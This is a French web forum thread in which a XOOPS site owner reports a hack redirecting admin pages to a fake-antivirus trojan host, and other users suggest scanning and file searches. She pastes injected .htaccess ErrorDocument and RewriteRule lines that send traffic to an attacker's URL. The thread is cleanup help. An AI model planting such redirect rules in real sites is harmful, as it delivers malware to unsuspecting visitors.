Bonjour,

Sur un de mes sites, j'ai été hacké apparemment.

Le site s'affiche quand même pour les visiteurs, mais par contre pour moi, si je veux m'y connecter par "derrière" avec user.php et admin.php, j'ai Kaspersky internet security qui me detecte que le site veut m'envoyer un trojan, analyse du hdd etc... :




L'URL demandée ne peut être affichée

L'objet sollicité à l'adresse URL :

htt p: // ns1.asmartmovehi.com / index.php

Contient une menace :

l'objet est infecté par Trojan.Win32.FakeAV.or




Comme je suis bien protégé il ne passe pas, mai sje peux plus me connecter en admin (web).


Ce que je en comprends pas, c'est que le site est bien visible (visiteurs) : heureusement !!!


J'ai la dernière version de xoops et de protector, mais pas de .htaccess.

Est ce que c'est mon fichier .index.php ou mainfile.php qui sont corrompus ou plutôt ma bdd ?


J'ai écris à mon hebergeur qui me dit evidemment qu'ils n'ont pas subi d'attaques, et que c'est mon script qui a été attaqué.

A moi de me debrouiller...


Merci de votre réponse.

Cordialement,

Celine

Télécharge le ftp sur ton site et passe le a l'antivirus si tu n'as rien tu cherche avec un logiciel comme notepad++ le site incriminer au passage évite de poster le lien vers un site hacké car ca signale google les site qui renvoie vers et donc frxoops j'ai modifié) si tu as toujours rien tu fait une recherche sur les iframe et tu les vérifie toutes

PS en principe ca doit être fichier index qui est infecté donc si tu trouve pas vérifie ceux des répertoire et sous répertoire de l'admin et met en dans tous les répertoire ou tu en a pas

Bonsoir,

J'ai transferer le site sur mon hdd et analysé avec kaspersky : rien.

Avec ultraedit (car notepad ++ est en anglais, je ne sais pas comment chercher dans des fichiers externes avec), j'ai donc cherché le lien cité + haut.


J'ai ceci : (j'ai renommé le site cité + haut en tartanpion, pour qu'il n'y ait pas de soucis) :


Recherche de 'ns1.asmartmovehi.com' dans 'D:\SAUVEGARDES SITES\SITE TARTANPION\.htaccess' :
D:\SAUVEGARDES SITES\SITE TARTANPION\.htaccess.htaccess(67): ErrorDocument 500 http://tartanpion.com/main.php?i=J86og9UVq/+hiRj+UcNFwpEZ&e=0
D:\SAUVEGARDES SITES\SITE TARTANPION\.htaccess.htaccess(68): ErrorDocument 502 http://tartanpion.com/main.php?i=J86og9UVq/+hiRj+UcNFwpEZ&e=2
D:\SAUVEGARDES SITES\SITE TARTANPION\.htaccess.htaccess(69): ErrorDocument 403 http://tartanpion.com/main.php?i=J86og9UVq/+hiRj+UcNFwpEZ&e=3
D:\SAUVEGARDES SITES\SITE TARTANPION\.htaccess.htaccess(119): RewriteRule .* http://tartanpion.com/main.php?e=r&h=%{HTTP_HOST}&i=J86og9UVq/+hiRj+UcNFwpEZ [R,L]
D:\SAUVEGARDES SITES\SITE TARTANPION\.htaccess.htaccess(125): RewriteRule .* http://tartanpion.com/main.php?e=4&h=%{HTTP_HOST}&i=J86og9UVq/+hiRj+UcNFwpEZ [R,L]
Trouvé 'tartanpion.com' 5 fois.
Recherche effectuée, Trouvé 'tartanpion.com' 5 fois. (1 fichier(s)).




Donc c'est dans le .htaccess relatif au mainfile ?


Je dois modifier quel fichier du coup sur le site, avec mes sauvegardes ?


Merci de ta réponse.


Cordialement,

Celine

Salut, donc apparemment, c'est le fichier .htaccess à la base de ton site qui renvoie vers ce site (c'est un site qui envoie une fausse alerte de virus pour faire acheter un antivirus bidon).
Tu pourras nous coller ici le contenu complet de ton .htaccess ? (en changeant le nom du site vers lequel on est redirigé).
On commencera déjà par éditer ça.
Par contre, s'il a pu éditer ton fichier .htaccess, c'est qu'il y a une faille quelque part chez ton hébergeur ou sur ton site.

Bonjour,

Je n'arrive pas à visualiser le contenu du .htaccess avec ultraedit ou notepadd++.

Merci

Celine

pour notepad ++ il est en français
http://notepad-plus.sourceforge.net/fr/site.htm

et tu peut très bien éditer le .htaccess avec lui

Bonjour Celine,

Si tout es ok dans ton .htaccess, essaie aussi de scanner ta BDD, le virus peut se trouver dedans.

Une autre astuce est de scanner avec un autre anti-virus et essaie aussi un anti-malware, tu as malwarwbytes qui est assez efficace.

@++
Sharkane

Salut,
Tu n'as toujours pas pu éditer ton .htaccess ?

Si tu as arrives à accéder à ton admin, tu peux aussi tester avec ce module
https://www.frxoops.org/modules/TDMDow ... glefile.php?cid=1&lid=152

Une version 2.03 semble être disponible (voir le commentaire de Burning).